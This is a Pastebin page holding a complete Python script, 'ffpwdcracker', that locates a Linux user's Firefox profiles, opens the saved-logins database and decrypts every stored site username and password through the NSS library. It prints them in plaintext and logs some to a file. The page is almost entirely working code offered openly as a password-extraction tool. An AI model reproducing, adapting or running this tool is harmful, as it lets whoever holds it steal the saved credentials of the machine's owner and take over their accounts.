Pastebin launched a little side project called HostCabi.net, check it out ;-)Don't like ads? PRO users don't see any ads ;-)
Guest

ffpwdcracker

By: a guest on May 10th, 2011  |  syntax: Python  |  size: 3.28 KB  |  hits: 444  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. #!/usr/bin/env python
  2. # ffpwdcracker - Crack the passwords stored using Firefox browser. The script currently works only on Linux.
  3. #
  4. # usage: ffpwdcracker [paths_to_location_of_files]
  5. # Run it with no paramters to extract the standard Passwords from all Profiles of the current
  6. # logged in User.
  7. # Required files:
  8. #    + key3.db
  9. #    + signongs.sqlite
  10. #    + cert8.db
  11. # are used and needed to collect the passwords.
  12. from ctypes import *
  13. import struct
  14. import sys
  15. import os
  16. import glob
  17. import re
  18. import time
  19. import base64
  20.  
  21. #Password structures
  22. class SECItem(Structure):
  23.         _fields_ = [('type',c_uint),('data',c_void_p),('len',c_uint)]
  24.                
  25. class secuPWData(Structure):
  26.         _fields_ = [('source',c_ubyte),('data',c_char_p)]
  27.  
  28. (SECWouldBlock,SECFailure,SECSuccess)=(-2,-1,0)
  29. (PW_NONE,PW_FROMFILE,PW_PLAINTEXT,PW_EXTERNAL)=(0,1,2,3)
  30.  
  31. def findpath_userdirs():
  32.         appdata = os.getenv('HOME')
  33.         usersdir = appdata+os.sep+".mozilla"+os.sep+'firefox'
  34.         userdir = os.listdir(usersdir)
  35.         res=[]
  36.         for user in userdir:
  37.                 if os.path.isdir(usersdir+os.sep+user):
  38.                         res.append(usersdir+os.sep+user)
  39.         return res
  40.        
  41. def errorlog(row,path):
  42.         print "----[-]Error while Decoding! writting error.log:"
  43.         print libnss.PORT_GetError()
  44.         try:
  45.                 f=open('error.log','a')
  46.                 f.write("-------------------\n")
  47.                 f.write("#ERROR in: %s at %s\n" %(path,time.ctime()))
  48.                 f.write("Site: %s\n"%row[1])
  49.                 f.write("Username: %s\n"%row[6])
  50.                 f.write("Password: %s\n"%row[7])
  51.                 f.write("-------------------\n")
  52.                 f.close()
  53.         except IOError:
  54.                 print "Error while writing logfile - No log created!"
  55.  
  56.  
  57.  
  58. #reads the signons.sqlite which is a sqlite3 Database (>Firefox 3)
  59. def readsignonDB(userpath,dbname):
  60.         if libnss.NSS_Init(userpath)!=0:
  61.                 print """Error Initalizing NSS_Init,\n
  62.                 propably no usefull results"""
  63.         print "Dirname: %s"%os.path.split(userpath)[-1]
  64.         import sqlite3
  65.         conn = sqlite3.connect(userpath+os.sep+dbname)
  66.         c = conn.cursor()
  67.         c.execute("SELECT * FROM moz_logins;")
  68.         for row in c:
  69.                 print "--Site(%s):"%row[1]
  70.                 uname.data  = cast(c_char_p(base64.b64decode(row[6])),c_void_p)
  71.                 uname.len = len(base64.b64decode(row[6]))
  72.                 passwd.data = cast(c_char_p(base64.b64decode(row[7])),c_void_p)
  73.                 passwd.len=len(base64.b64decode(row[7]))
  74.                 if libnss.PK11SDR_Decrypt(byref(uname),byref(dectext),byref(pwdata))==-1:
  75.                         errorlog(row,userpath+os.sep+dbname)
  76.                 print "----Username %s" % string_at(dectext.data,dectext.len)
  77.                 if libnss.PK11SDR_Decrypt(byref(passwd),byref(dectext),byref(pwdata))==-1:
  78.                         errorlog(row,userpath+os.sep+dbname)
  79.                 print "----Password %s" % string_at(dectext.data,dectext.len)
  80.         c.close()
  81.         conn.close()
  82.         libnss.NSS_Shutdown()
  83.  
  84.  
  85. ################# MAIN #################
  86. if len(sys.argv)==1:
  87.         ordner = findpath_userdirs()
  88. else:
  89.         ordner=sys.argv[1:]
  90.  
  91. #Load the libnss3 linked file
  92. libnss = CDLL("libnss3.so")
  93.  
  94. pwdata = secuPWData()
  95. pwdata.source = PW_NONE
  96. pwdata.data=0
  97.  
  98. uname = SECItem()
  99. passwd = SECItem()
  100. dectext = SECItem()
  101.  
  102. for user in ordner:
  103.         signonfiles = glob.glob(user+os.sep+"signons*.*")
  104.         for signonfile in signonfiles:
  105.                 (filepath,filename) = os.path.split(signonfile)
  106.                 filetype = re.findall('\.(.*)',filename)[0]
  107.                 if filetype.lower() == "sqlite":
  108.                         readsignonDB(filepath,filename)
  109.                 else:
  110.                         print "Unhandled Signons File: %s" % filename
  111.                         print "Skipping"